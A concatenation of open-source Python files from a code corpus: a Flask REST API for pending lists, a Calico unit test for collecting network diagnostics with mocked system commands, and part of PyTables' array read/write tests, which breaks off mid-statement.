jsonify(list.to_dict()) @api.response(200, description='list successfully deleted', model=base_message_schema) @api.response(NotFoundError) def delete(self, list_id, session=None): """ Delete pending list by ID """ try: db.delete_list_by_id(list_id=list_id, session=session) except NoResultFound: raise NotFoundError('list_id %d does not exist' % list_id) return success_response('list successfully deleted') base_entry_schema = api.schema_model('base_entry_schema', ObjectsContainer.base_entry_object) pending_list_entry_base_schema = api.schema_model( 'pending_list.entry_base_schema', ObjectsContainer.pending_list_entry_base_object ) pending_lists_entries_return_schema = api.schema_model( 'pending_list.entry_return_schema', ObjectsContainer.pending_lists_entries_return_object ) sort_choices = ('id', 'added', 'title', 'original_url', 'list_id', 'approved') entries_parser = api.pagination_parser(sort_choices=sort_choices, default='title') entries_parser.add_argument('filter', help='Filter by title name') @pending_list_api.route('/<int:list_id>/entries/') @api.doc(params={'list_id': 'ID of the list'}, parser=entries_parser) @api.response(NotFoundError) class PendingListEntriesAPI(APIResource): @etag @api.response(200, model=pending_lists_entries_return_schema) def get(self, list_id, session=None): """ Get entries by list ID """ try: list = db.get_list_by_id(list_id=list_id, session=session) except NoResultFound: raise NotFoundError('list_id %d does not exist' % list_id) args = entries_parser.parse_args() # Pagination and sorting params page = args['page'] per_page = args['per_page'] sort_by = args['sort_by'] sort_order = args['order'] filter_ = args['filter'] # Handle max size limit if per_page > 100: per_page = 100 start = per_page * (page - 1) stop = start + per_page descending = sort_order == 'desc' kwargs = { 'start': start, 'stop': stop, 'list_id': list_id, 'order_by': sort_by, 'descending': descending, 'filter': filter_, 'session': session, } total_items = list.entries.count() if not total_items: return jsonify([]) log.debug('pending lists entries count is %d', total_items) entries = [entry.to_dict() for entry in db.get_entries_by_list_id(**kwargs)] # Total number of pages total_pages = int(ceil(total_items / float(per_page))) if page > total_pages: raise NotFoundError('page %s does not exist' % page) # Actual results in page actual_size = min(len(entries), per_page) # Get pagination headers pagination = pagination_headers(total_pages, total_items, actual_size, request) # Create response rsp = jsonify(entries) # Add link header to response rsp.headers.extend(pagination) return rsp @api.validate(base_entry_schema) @api.response( 201, description='Successfully created entry object', model=pending_list_entry_base_schema ) @api.response(Conflict) def post(self, list_id, session=None): """ Create a new entry object""" try: db.get_list_by_id(list_id=list_id, session=session) except NoResultFound: raise NotFoundError('list_id %d does not exist' % list_id) data = request.json title = data.get('title') entry_object = db.get_entry_by_title(list_id=list_id, title=title, session=session) if entry_object: raise Conflict('entry with title \'%s\' already exists' % title) entry_object = db.PendingListEntry(entry=data, pending_list_id=list_id) if data.get('approved'): entry_object.approved = data['approved'] session.add(entry_object) session.commit() response = jsonify(entry_object.to_dict()) response.status_code = 201 return response @pending_list_api.route('/<int:list_id>/entries/<int:entry_id>/') @api.doc(params={'list_id': 'ID of the list', 'entry_id': 'ID of the entry'}) @api.response(NotFoundError) class PendingListEntryAPI(APIResource): @etag @api.response(200, model=pending_list_entry_base_schema) def get(self, list_id, entry_id, session=None): """ Get an entry by list ID and entry ID """ try: entry = db.get_entry_by_id(list_id=list_id, entry_id=entry_id, session=session) except NoResultFound: raise NotFoundError('could not find entry with id %d in list %d' % (entry_id, list_id)) return jsonify(entry.to_dict()) @api.response(200, model=base_message_schema) def delete(self, list_id, entry_id, session=None): """ Delete an entry by list ID and entry ID """ try: entry = db.get_entry_by_id(list_id=list_id, entry_id=entry_id, session=session) except NoResultFound: raise NotFoundError('could not find entry with id %d in list %d' % (entry_id, list_id)) log.debug('deleting movie %d', entry.id) session.delete(entry) return success_response('successfully deleted entry %d' % entry.id) @api.response(201, model=pending_list_entry_base_schema) @api.validate(model=pending_list_operation_schema) @api.doc(description='Approve or reject an entry\'s status') def put(self, list_id, entry_id, session=None): """Sets entry object's pending status""" try: entry = db.get_entry_by_id(list_id=list_id, entry_id=entry_id, session=session) except NoResultFound: raise NotFoundError('could not find entry with id %d in list %d' % (entry_id, list_id)) data = request.json approved = data['operation'] == 'approve' operation_text = 'approved' if approved else 'pending' if entry.approved is approved: raise BadRequest('Entry with id {} is already {}'.format(entry_id, operation_text)) entry.approved = approved session.commit() rsp = jsonify(entry.to_dict()) rsp.status_code = 201 return rsp
mit
johscheuer/calico-docker
calico_containers/tests/unit/diags_test.py
6
8204
# Copyright 2015 Metaswitch Networks # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest from mock import patch, Mock, call, ANY from sh import Command, CommandNotFound from pycalico.datastore import DatastoreClient from etcd import EtcdResult, EtcdException, Client from calico_ctl import diags class TestDiags(unittest.TestCase): @patch('calico_ctl.diags.tempfile', autospec=True) @patch('os.mkdir', autospec=True) @patch('os.path.isdir', autospec=True) @patch('calico_ctl.diags.datetime', autospec=True) @patch('__builtin__.open', autospec=True) @patch('socket.gethostname', autospec=True) @patch('sh.Command._create', spec=Command) @patch('calico_ctl.diags.copytree', autospec=True) @patch('tarfile.open', autospec=True) @patch('calico_ctl.diags.DatastoreClient', autospec=True) @patch('calico_ctl.diags.subprocess', autospec=True) def test_save_diags(self, m_subprocess, m_DatastoreClient, m_tarfile_open, m_copytree, m_sh_command, m_socket, m_open, m_datetime, os_path_isdir, m_os_mkdir, m_tempfile): """ Test save_diags for calicoctl diags command """ # Set up mock objects m_tempfile.mkdtemp.return_value = '/temp/dir' date_today = '2015-7-24_09_05_00' m_datetime.strftime.return_value = date_today m_socket.return_value = 'hostname' m_sh_command_return = Mock(autospec=True) m_sh_command.return_value = m_sh_command_return m_datetime.today.return_value = 'diags-07242015_090500.tar.gz' m_os_mkdir.return_value = True # The DatastoreClient contains an etcd Client # The etcd Client reads in a list of children of type EtcdResult # The children are accessed by calling get_subtree method on the etcd Client m_datastore_client = Mock(spec=DatastoreClient) m_datastore_client.etcd_client = Mock(spec=Client) m_datastore_data = Mock(spec=EtcdResult) m_child_1 = EtcdResult(node={'dir': True, 'key': 666}) m_child_2 = EtcdResult(node={'key': 555, 'value': 999}) m_datastore_data.get_subtree.return_value = [m_child_1, m_child_2] m_datastore_client.etcd_client.read.return_value = m_datastore_data m_DatastoreClient.return_value = m_datastore_client m_open.return_value = Mock() # Set up arguments log_dir = '/log/dir' temp_dir = '/temp/dir/' diags_dir = temp_dir + 'diagnostics' # Call method under test diags.save_diags(log_dir) # Assert m_subprocess.call.assert_called_once_with( ["docker", "exec", "calico-node", "pkill", "-SIGUSR1", "felix"]) m_tempfile.mkdtemp.assert_called_once_with() m_os_mkdir.assert_called_once_with(diags_dir) m_open.assert_has_calls([ call(diags_dir + '/date', 'w'), call(diags_dir + '/hostname', 'w'), call(diags_dir + '/netstat', 'w'), call(diags_dir + '/route', 'w'), call(diags_dir + '/iptables', 'w'), call(diags_dir + '/ipset', 'w'), call(diags_dir + '/etcd_calico', 'w') ], any_order=True) self.assertEqual(m_open.return_value.close.call_count, 7) m_sh_command.assert_has_calls([ call('netstat'), call()(all=True, numeric=True), call('route'), call()(numeric=True), call('ip'), call()('route'), call()('-6', 'route'), call('iptables-save'), call()(), call('ipset'), call()('list') ]) m_datastore_client.etcd_client.read.assert_called_once_with('/calico', recursive=True) m_copytree.assert_called_once_with(log_dir, diags_dir + '/logs', ignore=ANY) m_tarfile_open.assert_called_once_with(temp_dir + date_today, 'w:gz') @patch('calico_ctl.diags.tempfile', autospec=True) @patch('os.mkdir', autospec=True) @patch('os.path.isdir', autospec=True) @patch('calico_ctl.diags.datetime', autospec=True) @patch('__builtin__.open', autospec=True) @patch('socket.gethostname', autospec=True) @patch('sh.Command._create', spec=Command) @patch('calico_ctl.diags.copytree', autospec=True) @patch('tarfile.open', autospec=True) @patch('calico_ctl.diags.DatastoreClient', autospec=True) @patch('calico_ctl.diags.subprocess', autospec=True) def test_save_diags_exceptions( self, m_subprocess, m_DatastoreClient, m_tarfile_open, m_copytree, m_sh_command, m_socket, m_open, m_datetime, m_os_path_isdir, m_os_mkdir, m_tempfile): """ Test all exception cases save_diags method in calicoctl diags command Raise CommandNotFound when sh.Command._create is called Raise EtcdException when trying to read from the etcd datastore Return false when trying to read logs from log directory """ # Set up mock objects m_tempfile.mkdtemp.return_value = '/temp/dir' date_today = '2015-7-24_09_05_00' m_datetime.strftime.return_value = date_today m_socket.return_value = 'hostname' m_sh_command_return = Mock(autospec=True) m_sh_command.return_value = m_sh_command_return m_sh_command.side_effect= CommandNotFound m_os_path_isdir.return_value = False m_datastore_client = Mock(spec=DatastoreClient) m_datastore_client.etcd_client = Mock(spec=Client) m_datastore_client.etcd_client.read.side_effect = EtcdException m_DatastoreClient.return_value = m_datastore_client m_open.return_value = Mock() # Set up arguments log_dir = '/log/dir' temp_dir = '/temp/dir/' diags_dir = temp_dir + 'diagnostics' # Call method under test diags.save_diags(log_dir) # Assert m_subprocess.call.assert_called_once_with( ["docker", "exec", "calico-node", "pkill", "-SIGUSR1", "felix"]) m_open.assert_has_calls([ call(diags_dir + '/date', 'w'), call(diags_dir + '/hostname', 'w'), call(diags_dir + '/netstat', 'w'), call(diags_dir + '/route', 'w'), call(diags_dir + '/iptables', 'w'), call(diags_dir + '/ipset', 'w'), call(diags_dir + '/etcd_calico', 'w') ], any_order=True) m_open.return_value.write.assert_has_calls([ call().__enter__().write('hostname'), call().__enter__().write('DATE=%s' % date_today) ], any_order=True) self.assertEqual(m_open.return_value.close.call_count, 7) self.assertNotIn([ call().__enter__().writelines(m_sh_command_return()), call().__enter__().write('route --numeric\n'), call().__enter__().writelines(m_sh_command_return()), call().__enter__().write('ip route\n'), call().__enter__().writelines(m_sh_command_return()), call().__enter__().write('ip -6 route\n'), call().__enter__().writelines(m_sh_command_return()), call().__enter__().writelines(m_sh_command_return()), call().__enter__().writelines(m_sh_command_return()), call(diags_dir + '/etcd_calico', 'w'), call().__enter__().write('dir?, key, value\n'), call().__enter__().write('DIR, 666,\n'), call().__enter__().write('FILE, 555, 999\n') ], m_open.mock_calls) self.assertFalse(m_copytree.called) m_tarfile_open.assert_called_once_with(temp_dir + date_today, 'w:gz')
apache-2.0
jack-pappas/PyTables
tables/tests/test_array.py
2
95560
# -*- coding: utf-8 -*- from __future__ import print_function import os import sys import tempfile import warnings import numpy from numpy import testing as npt import tables from tables import Atom, ClosedNodeError, NoSuchNodeError from tables.utils import byteorders from tables.tests import common from tables.tests.common import allequal from tables.tests.common import unittest from tables.tests.common import PyTablesTestCase as TestCase warnings.resetwarnings() class BasicTestCase(TestCase): """Basic test for all the supported typecodes present in numpy. All of them are included on pytables. """ endiancheck = False def write_read(self, testarray): a = testarray if common.verbose: print('\n', '-=' * 30) print("Running test for array with type '%s'" % a.dtype.type, end=' ') print("for class check:", self.title) # Create an instance of HDF5 file filename = tempfile.mktemp(".h5") try: with tables.open_file(filename, mode="w") as fileh: root = fileh.root # Create the array under root and name 'somearray' if self.endiancheck and a.dtype.kind != "S": b = a.byteswap() b.dtype = a.dtype.newbyteorder() a = b fileh.create_array(root, 'somearray', a, "Some array") # Re-open the file in read-only mode with tables.open_file(filename, mode="r") as fileh: root = fileh.root # Read the saved array b = root.somearray.read() # Compare them. They should be equal. if common.verbose and not allequal(a, b): print("Write and read arrays differ!") # print("Array written:", a) print("Array written shape:", a.shape) print("Array written itemsize:", a.itemsize) print("Array written type:", a.dtype.type) # print("Array read:", b) print("Array read shape:", b.shape) print("Array read itemsize:", b.itemsize) print("Array read type:", b.dtype.type) if a.dtype.kind != "S": print("Array written byteorder:", a.dtype.byteorder) print("Array read byteorder:", b.dtype.byteorder) # Check strictly the array equality self.assertEqual(a.shape, b.shape) self.assertEqual(a.shape, root.somearray.shape) if a.dtype.kind == "S": self.assertEqual(root.somearray.atom.type, "string") else: self.assertEqual(a.dtype.type, b.dtype.type) self.assertEqual(a.dtype.type, root.somearray.atom.dtype.type) abo = byteorders[a.dtype.byteorder] bbo = byteorders[b.dtype.byteorder] if abo != "irrelevant": self.assertEqual(abo, root.somearray.byteorder) self.assertEqual(bbo, sys.byteorder) if self.endiancheck: self.assertNotEqual(bbo, abo) obj = root.somearray self.assertEqual(obj.flavor, 'numpy') self.assertEqual(obj.shape, a.shape) self.assertEqual(obj.ndim, a.ndim) self.assertEqual(obj.chunkshape, None) if a.shape: nrows = a.shape[0] else: # scalar nrows = 1 self.assertEqual(obj.nrows, nrows) self.assertTrue(allequal(a, b)) finally: # Then, delete the file os.remove(filename) def write_read_out_arg(self, testarray): a = testarray if common.verbose: print('\n', '-=' * 30) print("Running test for array with type '%s'" % a.dtype.type, end=' ') print("for class check:", self.title) # Create an instance of HDF5 file filename = tempfile.mktemp(".h5") try: with tables.open_file(filename, mode="w") as fileh: root = fileh.root # Create the array under root and name 'somearray' if self.endiancheck and a.dtype.kind != "S": b = a.byteswap() b.dtype = a.dtype.newbyteorder() a = b fileh.create_array(root, 'somearray', a, "Some array") # Re-open the file in read-only mode with tables.open_file(filename, mode="r") as fileh: root = fileh.root # Read the saved array b = numpy.empty_like(a, dtype=a.dtype) root.somearray.read(out=b) # Check strictly the array equality self.assertEqual(a.shape, b.shape) self.assertEqual(a.shape, root.somearray.shape) if a.dtype.kind == "S": self.assertEqual(root.somearray.atom.type, "string") else: self.assertEqual(a.dtype.type, b.dtype.type) self.assertEqual(a.dtype.type, root.somearray.atom.dtype.type) abo = byteorders[a.dtype.byteorder] bbo = byteorders[b.dtype.byteorder] if abo != "irrelevant": self.assertEqual(abo, root.somearray.byteorder) self.assertEqual(abo, bbo) if self.endiancheck: self.assertNotEqual(bbo, sys.byteorder) self.assertTrue(allequal(a, b)) finally: # Then, delete the file os.remove(filename) def write_read_atom_shape_args(self, testarray): a = testarray atom = Atom.from_dtype(a.dtype) shape = a.shape byteorder = None if common.verbose: print('\n', '-=' * 30) print("Running test for array with type '%s'" % a.dtype.type, end=' ') print("for class check:", self.title) # Create an instance of HDF5 file filename = tempfile.mktemp(".h5") try: with tables.open_file(filename, mode="w") as fileh: root = fileh.root # Create the array under root and name 'somearray' if self.endiancheck and a.dtype.kind != "S": b = a.byteswap() b.dtype = a.dtype.newbyteorder() if b.dtype.byteorder in ('>', '<'): byteorder = byteorders[b.dtype.byteorder] a = b ptarr = fileh.create_array(root, 'somearray', atom=atom, shape=shape, title="Some array", # specify the byteorder explicitly # since there is no way to deduce # it in this case byteorder=byteorder) self.assertEqual(shape, ptarr.shape) self.assertEqual(atom, ptarr.atom) ptarr[...] = a # Re-open the file in read-only mode with tables.open_file(filename, mode="r") as fileh: root = fileh.root # Read the saved array b = root.somearray.read() # Compare them. They should be equal. if common.verbose and not allequal(a, b): print("Write and read arrays differ!") # print("Array written:", a) print("Array written shape:", a.shape) print("Array written itemsize:", a.itemsize) print("Array written type:", a.dtype.type) # print("Array read:", b) print("Array read shape:", b.shape) print("Array read itemsize:", b.itemsize) print("Array read type:", b.dtype.type) if a.dtype.kind != "S": print("Array written byteorder:", a.dtype.byteorder) print("Array read byteorder:", b.dtype.byteorder) # Check strictly the array equality self.assertEqual(a.shape, b.shape) self.assertEqual(a.shape, root.somearray.shape) if a.dtype.kind == "S": self.assertEqual(root.somearray.atom.type, "string") else: self.assertEqual(a.dtype.type, b.dtype.type) self.assertEqual(a.dtype.type, root.somearray.atom.dtype.type) abo = byteorders[a.dtype.byteorder] bbo = byteorders[b.dtype.byteorder] if abo != "irrelevant": self.assertEqual(abo, root.somearray.byteorder) self.assertEqual(bbo, sys.byteorder) if self.endiancheck: self.assertNotEqual(bbo, abo) obj = root.somearray self.assertEqual(obj.flavor, 'numpy') self.assertEqual(obj.shape, a.shape) self.assertEqual(obj.ndim, a.ndim) self.assertEqual(obj.chunkshape, None) if a.shape: nrows = a.shape[0] else: # scalar nrows = 1 self.assertEqual(obj.nrows, nrows) self.assertTrue(allequal(a, b)) finally: # Then, delete the file os.remove(filename) def setup00_char(self): """Data integrity during recovery (character objects)""" if not isinstance(self.tupleChar, numpy.ndarray): a = numpy.array(self.tupleChar, dtype="S") else: a = self.tupleChar return a def test00_char(self): a = self.setup00_char() self.write_read(a) def test00_char_out_arg(self): a = self.setup00_char() self.write_read_out_arg(a) def test00_char_atom_shape_args(self): a = self.setup00_char() self.write_read_atom_shape_args(a) def test00b_char(self): """Data integrity during recovery (string objects)""" a = self.tupleChar filename = tempfile.mktemp(".h5") try: # Create an instance of HDF5 file with tables.open_file(filename, mode="w") as fileh: fileh.create_array(fileh.root, 'somearray', a, "Some array") # Re-open the file in read-only mode with tables.open_file(filename, mode="r") as fileh: # Read the saved array b = fileh.root.somearray.read() if isinstance(a, bytes): self.assertEqual(type(b), bytes) self.assertEqual(a, b) else: # If a is not a python string, then it should be a list # or ndarray self.assertTrue(type(b) in [list, numpy.ndarray]) finally: # Then, delete the file os.remove(filename) def test00b_char_out_arg(self): """Data integrity during recovery (string objects)""" a = self.tupleChar filename = tempfile.mktemp(".h5") try: # Create an instance of HDF5 file with tables.open_file(filename, mode="w") as fileh: fileh.create_array(fileh.root, 'somearray', a, "Some array") # Re-open the file in read-only mode with tables.open_file(filename, mode="r") as fileh: # Read the saved array b = numpy.empty_like(a) if fileh.root.somearray.flavor != 'numpy': self.assertRaises(TypeError, lambda: fileh.root.somearray.read(out=b)) else: fileh.root.somearray.read(out=b) self.assertTrue(type(b), numpy.ndarray) finally: # Then, delete the file os.remove(filename) def test00b_char_atom_shape_args(self): """Data integrity during recovery (string objects)""" a = self.tupleChar filename = tempfile.mktemp(".h5") try: # Create an instance of HDF5 file with tables.open_file(filename, mode="w") as fileh: nparr = numpy.asarray(a) atom = Atom.from_dtype(nparr.dtype) shape = nparr.shape if nparr.dtype.byteorder in ('>', '<'): byteorder = byteorders[nparr.dtype.byteorder] else: byteorder = None ptarr = fileh.create_array(fileh.root, 'somearray', atom=atom, shape=shape, byteorder=byteorder, title="Some array") self.assertEqual(shape, ptarr.shape) self.assertEqual(atom, ptarr.atom) ptarr[...] = a # Re-open the file in read-only mode with tables.open_file(filename, mode="r") as fileh: # Read the saved array b = numpy.empty_like(a) if fileh.root.somearray.flavor != 'numpy': self.assertRaises(TypeError, lambda: fileh.root.somearray.read(out=b)) else: fileh.root.somearray.read(out=b) self.assertTrue(type(b), numpy.ndarray) finally: # Then, delete the file os.remove(filename) def setup01_char_nc(self): """Data integrity during recovery (non-contiguous character objects)""" if not isinstance(self.tupleChar, numpy.ndarray): a = numpy.array(self.tupleChar, dtype="S") else: a = self.tupleChar if a.ndim == 0: b = a.copy() else: b = a[::2] # Ensure that this numpy string is non-contiguous if len(b) > 1: self.assertEqual(b.flags.contiguous, False) return b def test01_char_nc(self): b = self.setup01_char_nc() self.write_read(b) def test01_char_nc_out_arg(self): b = self.setup01_char_nc() self.write_read_out_arg(b) def test01_char_nc_atom_shape_args(self): b = self.setup01_char_nc() self.write_read_atom_shape_args(b) def test02_types(self): """Data integrity during recovery (numerical types)""" typecodes = ['int8', 'int16', 'int32', 'int64', 'uint8', 'uint16', 'uint32', 'uint64', 'float32', 'float64', 'complex64', 'complex128'] for name in ('float16', 'float96', 'float128', 'complex192', 'complex256'): atomname = name.capitalize() + 'Atom' if hasattr(tables, atomname): typecodes.append(name) for typecode in typecodes: a = numpy.array(self.tupleInt, typecode) self.write_read(a) b = numpy.array(self.tupleInt, typecode) self.write_read_out_arg(b) c = numpy.array(self.tupleInt, typecode) self.write_read_atom_shape_args(c) def test03_types_nc(self): """Data integrity during recovery (non-contiguous numerical types)""" typecodes = ['int8', 'int16', 'int32', 'int64', 'uint8', 'uint16', 'uint32', 'uint64', 'float32', 'float64', 'complex64', 'complex128', ] for name in ('float16', 'float96', 'float128', 'complex192', 'complex256'): atomname = name.capitalize() + 'Atom' if hasattr(tables, atomname): typecodes.append(name) for typecode in typecodes: a = numpy.array(self.tupleInt, typecode) if a.ndim == 0: b1 = a.copy() b2 = a.copy() b3 = a.copy() else: b1 = a[::2] b2 = a[::2] b3 = a[::2] # Ensure that this array is non-contiguous if len(b1) > 1: self.assertEqual(b1.flags.contiguous, False) if len(b2) > 1: self.assertEqual(b2.flags.contiguous, False) if len(b3) > 1: self.assertEqual(b3.flags.contiguous, False) self.write_read(b1) self.write_read_out_arg(b2) self.write_read_atom_shape_args(b3) class Basic0DOneTestCase(BasicTestCase): # Scalar case title = "Rank-0 case 1" tupleInt = 3 tupleChar = b"3" endiancheck = True class Basic0DTwoTestCase(BasicTestCase): # Scalar case title = "Rank-0 case 2" tupleInt = 33 tupleChar = b"33" endiancheck = True class Basic1DZeroTestCase(BasicTestCase): # This test case is not supported by PyTables (HDF5 limitations) # 1D case title = "Rank-1 case 0" tupleInt = () tupleChar = () endiancheck = False class Basic1DOneTestCase(BasicTestCase): # 1D case title = "Rank-1 case 1" tupleInt = (3,) tupleChar = (b"a",) endiancheck = True class Basic1DTwoTestCase(BasicTestCase): # 1D case title = "Rank-1 case 2" tupleInt = (3, 4) tupleChar = (b"aaa",) endiancheck = True class Basic1DThreeTestCase(BasicTestCase): # 1D case title = "Rank-1 case 3" tupleInt = (3, 4, 5) tupleChar = (b"aaa", b"bbb",) endiancheck = True class Basic2DOneTestCase(BasicTestCase): # 2D case title = "Rank-2 case 1" tupleInt = numpy.array(numpy.arange((4)**2)) tupleInt.shape = (4,)*2 tupleChar = numpy.array(["abc"]*3**2, dtype="S3") tupleChar.shape = (3,)*2 endiancheck = True class Basic2DTwoTestCase(BasicTestCase): # 2D case, with a multidimensional dtype title = "Rank-2 case 2" tupleInt = numpy.array(numpy.arange((4)), dtype=(numpy.int_, (4,))) tupleChar = numpy.array(["abc"]*3, dtype=("S3", (3,))) endiancheck = True class Basic10DTestCase(BasicTestCase): # 10D case title = "Rank-10 test" tupleInt = numpy.array(numpy.arange((2)**10)) tupleInt.shape = (2,)*10 tupleChar = numpy.array( ["abc"]*2**10, dtype="S3") tupleChar.shape = (2,)*10 endiancheck = True class Basic32DTestCase(BasicTestCase): # 32D case (maximum) title = "Rank-32 test" tupleInt = numpy.array((32,)) tupleInt.shape = (1,)*32 tupleChar = numpy.array(["121"], dtype="S3") tupleChar.shape = (1,)*32 class ReadOutArgumentTests(common.TempFileMixin, TestCase): def setUp(self): super(ReadOutArgumentTests, self).setUp() self.size = 1000 def create_array(self): array = numpy.arange(self.size, dtype='f8') disk_array = self.h5file.create_array('/', 'array', array) return array, disk_array def test_read_entire_array(self): array, disk_array = self.create_array() out_buffer = numpy.empty((self.size, ), 'f8') disk_array.read(out=out_buffer) numpy.testing.assert_equal(out_buffer, array) def test_read_contiguous_slice1(self): array, disk_array = self.create_array() out_buffer = numpy.arange(self.size, dtype='f8') out_buffer = numpy.random.permutation(out_buffer) out_buffer_orig = out_buffer.copy() start = self.size // 2 disk_array.read(start=start, stop=self.size, out=out_buffer[start:]) numpy.testing.assert_equal(out_buffer[start:], array[start:]) numpy.testing.assert_equal(out_buffer[:start], out_buffer_orig[:start]) def test_read_contiguous_slice2(self): array, disk_array = self.create_array() out_buffer = numpy.arange(self.size, dtype='f8') out_buffer = numpy.random.permutation(out_buffer) out_buffer_orig = out_buffer.copy() start = self.size // 4 stop = self.size - start disk_array.read(start=start, stop=stop, out=out_buffer[start:stop]) numpy.testing.assert_equal(out_buffer[start:stop], array[start:stop]) numpy.testing.assert_equal(out_buffer[:start], out_buffer_orig[:start]) numpy.testing.assert_equal(out_buffer[stop:], out_buffer_orig[stop:]) def test_read_non_contiguous_slice_contiguous_buffer(self): array, disk_array = self.create_array() out_buffer = numpy.empty((self.size // 2, ), dtype='f8') disk_array.read(start=0, stop=self.size, step=2, out=out_buffer) numpy.testing.assert_equal(out_buffer, array[0:self.size:2]) def test_read_non_contiguous_buffer(self): array, disk_array = self.create_array() out_buffer = numpy.empty((self.size, ), 'f8') out_buffer_slice = out_buffer[0:self.size:2] # once Python 2.6 support is dropped, this could change # to assertRaisesRegexp to check exception type and message at once self.assertRaises(ValueError, disk_array.read, 0, self.size, 2, out_buffer_slice) try: disk_array.read(0, self.size, 2, out_buffer_slice) except ValueError as exc: self.assertEqual('output array not C contiguous', str(exc)) def test_buffer_too_small(self): array, disk_array = self.create_array() out_buffer = numpy.empty((self.size // 2, ), 'f8') self.assertRaises(ValueError, disk_array.read, 0, self.size, 1, out_buffer) try: disk_array.read(0, self.size, 1, out_buffer) except ValueError as exc: self.assertTrue('output array size invalid, got' in str(exc)) def test_buffer_too_large(self): array, disk_array = self.create_array() out_buffer = numpy.empty((self.size + 1, ), 'f8') self.assertRaises(ValueError, disk_array.read, 0, self.size, 1, out_buffer) try: disk_array.read(0, self.size, 1, out_buffer) except ValueError as exc: self.assertTrue('output array size invalid, got' in str(exc)) class SizeOnDiskInMemoryPropertyTestCase(common.TempFileMixin, TestCase): def setUp(self): super(SizeOnDiskInMemoryPropertyTestCase, self).setUp() self.array_size = (10, 10) self.array = self.h5file.create_array( '/', 'somearray', numpy.zeros(self.array_size, 'i4')) def test_all_zeros(self): self.assertEqual(self.array.size_on_disk, 10 * 10 * 4) self.assertEqual(self.array.size_in_memory, 10 * 10 * 4) class UnalignedAndComplexTestCase(common.TempFileMixin, TestCase): """Basic test for all the supported typecodes present in numpy. Most of them are included on PyTables. """ def setUp(self): super(UnalignedAndComplexTestCase, self).setUp() self.root = self.h5file.root def write_read(self, testArray): if common.verbose: print('\n', '-=' * 30) print("\nRunning test for array with type '%s'" % testArray.dtype.type) # Create the array under root and name 'somearray' a = testArray if self.endiancheck: byteorder = {"little": "big", "big": "little"}[sys.byteorder] else: byteorder = sys.byteorder self.h5file.create_array(self.root, 'somearray', a, "Some array", byteorder=byteorder) if self.reopen: self._reopen() self.root = self.h5file.root # Read the saved array b = self.root.somearray.read() # Get an array to be compared in the correct byteorder c = a.newbyteorder(byteorder) # Compare them. They should be equal. if not allequal(c, b) and common.verbose: print("Write and read arrays differ!") print("Array written:", a) print("Array written shape:", a.shape) print("Array written itemsize:", a.itemsize) print("Array written type:", a.dtype.type) print("Array read:", b) print("Array read shape:", b.shape) print("Array read itemsize:", b.itemsize) print("Array read type:", b.dtype.type) # Check strictly the array equality self.assertEqual(a.shape, b.shape) self.assertEqual(a.shape, self.root.somearray.shape) if a.dtype.byteorder != "|": self.assertEqual(a.dtype, b.dtype) self.assertEqual(a.dtype, self.root.somearray.atom.dtype) self.assertEqual(byteorders[b.dtype.byteorder], sys.byteorder) self.assertEqual(self.root.somearray.byteorder, byteorder) self.assertTrue(allequal(c, b)) def test01_signedShort_unaligned(self): """Checking an unaligned signed short integer array""" r = numpy.rec.array(b'a'*200, formats='i1,f4,i2', shape=10) a = r["f2"] # Ensure that this array is non-aligned self.assertEqual(a.flags.aligned, False) self.assertEqual(a.dtype.type, numpy.int16) self.write_read(a) def test02_float_unaligned(self): """Checking an unaligned single precision array""" r = numpy.rec.array(b'a'*200, formats='i1,f4,i2', shape=10) a = r["f1"] # Ensure that this array is non-aligned self.assertEqual(a.flags.aligned, 0) self.assertEqual(a.dtype.type, numpy.float32) self.write_read(a) def test03_byte_offset(self): """Checking an offsetted byte array""" r = numpy.arange(100, dtype=numpy.int8) r.shape = (10, 10) a = r[2] self.write_read(a) def test04_short_offset(self): """Checking an offsetted unsigned short int precision array""" r = numpy.arange(100, dtype=numpy.uint32) r.shape = (10, 10) a = r[2] self.write_read(a) def test05_int_offset(self): """Checking an offsetted integer array""" r = numpy.arange(100, dtype=numpy.int32) r.shape = (10, 10) a = r[2] self.write_read(a) def test06_longlongint_offset(self): """Checking an offsetted long long integer array""" r = numpy.arange(100, dtype=numpy.int64) r.shape = (10, 10) a = r[2] self.write_read(a) def test07_float_offset(self): """Checking an offsetted single precision array""" r = numpy.arange(100, dtype=numpy.float32) r.shape = (10, 10) a = r[2] self.write_read(a) def test08_double_offset(self): """Checking an offsetted double precision array""" r = numpy.arange(100, dtype=numpy.float64) r.shape = (10, 10) a = r[2] self.write_read(a) def test09_float_offset_unaligned(self): """Checking an unaligned and offsetted single precision array""" r = numpy.rec.array(b'a'*200, formats='i1,3f4,i2', shape=10) a = r["f1"][3] # Ensure that this array is non-aligned self.assertEqual(a.flags.aligned, False) self.assertEqual(a.dtype.type, numpy.float32) self.write_read(a) def test10_double_offset_unaligned(self): """Checking an unaligned and offsetted double precision array""" r = numpy.rec.array(b'a'*400, formats='i1,3f8,i2', shape=10) a = r["f1"][3] # Ensure that this array is non-aligned self.assertEqual(a.flags.aligned, False) self.assertEqual(a.dtype.type, numpy.float64) self.write_read(a) def test11_int_byteorder(self): """Checking setting data with different byteorder in a range (integer)""" # Save an array with the reversed byteorder on it a = numpy.arange(25, dtype=numpy.int32).reshape(5, 5) a = a.byteswap() a = a.newbyteorder() array = self.h5file.create_array( self.h5file.root, 'array', a, "byteorder (int)") # Read a subarray (got an array with the machine byteorder) b = array[2:4, 3:5] b = b.byteswap() b = b.newbyteorder() # Set this subarray back to the array array[2:4, 3:5] = b b = b.byteswap() b = b.newbyteorder() # Set this subarray back to the array array[2:4, 3:5] = b # Check that the array is back in the correct byteorder c = array[...] if common.verbose: print("byteorder of array on disk-->", array.byteorder) print("byteorder of subarray-->", b.dtype.byteorder) print("subarray-->", b) print("retrieved array-->", c) self.assertTrue(allequal(a, c)) def test12_float_byteorder(self): """Checking setting data with different byteorder in a range (float)""" # Save an array with the reversed byteorder on it a = numpy.arange(25, dtype=numpy.float64).reshape(5, 5) a = a.byteswap() a = a.newbyteorder() array = self.h5file.create_array( self.h5file.root, 'array', a, "byteorder (float)") # Read a subarray (got an array with the machine byteorder) b = array[2:4, 3:5] b = b.byteswap() b = b.newbyteorder() # Set this subarray back to the array array[2:4, 3:5] = b b = b.byteswap() b = b.newbyteorder() # Set this subarray back to the array array[2:4, 